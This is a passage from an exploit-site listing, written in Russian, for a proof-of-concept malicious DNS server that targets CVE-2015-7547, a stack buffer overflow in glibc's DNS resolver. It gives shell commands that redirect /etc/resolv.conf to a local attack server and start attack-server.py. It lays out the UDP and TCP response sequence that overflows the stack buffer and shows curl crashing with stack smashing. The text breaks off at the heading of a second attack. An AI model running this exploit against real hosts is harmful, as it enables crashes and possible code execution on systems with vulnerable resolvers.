Sploitus

Exploit for cve-2015-7547 CVE-2015-7547

kitploit · 2026-08-27

Exploit Code

MARKDOWN43 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JGAJEK-CVE-2015-7547
# PoC-сервер атаки для уязвимости CVE-2015-7547 в DNS-резолвере glibc

Для тестирования на локальной машине с уязвимой версией glibc:

root@kitploit:~
    
    
    user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
    user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
    user@localhost:/# sudo python3 attack-server.py 127.0.0.127
    Starting UDP server on 127.0.0.127:53...
    Starting TCP server on 127.0.0.127:53...
    

Затем из другого терминала выполните атаки, как показано в примерах ниже.

## Атака 1 (UDP+TCP)

Требуется возможность отправлять ответы размером более 2048 байт через UDP и TCP.

Последовательность атаки:

  1. UDP-ответ размером более 2048 байт, корректный заголовок/запрос, установлен флаг TC (вызывает некорректное управление буфером и повтор TCP)

  2. TCP-ответ, корректный заголовок/запрос (заставляет следующий ответ быть сохранённым в буфере, выделенном в стеке)

  3. TCP-ответ размером более 2048 байт (переполняет буфер, выделенный в стеке)




Пример:

root@kitploit:~
    
    
    user@localhost:/# curl http://attack1
    *** stack smashing detected ***: curl terminated
    Segmentation fault (core dumped)
    

## Атака 2 (только UDP)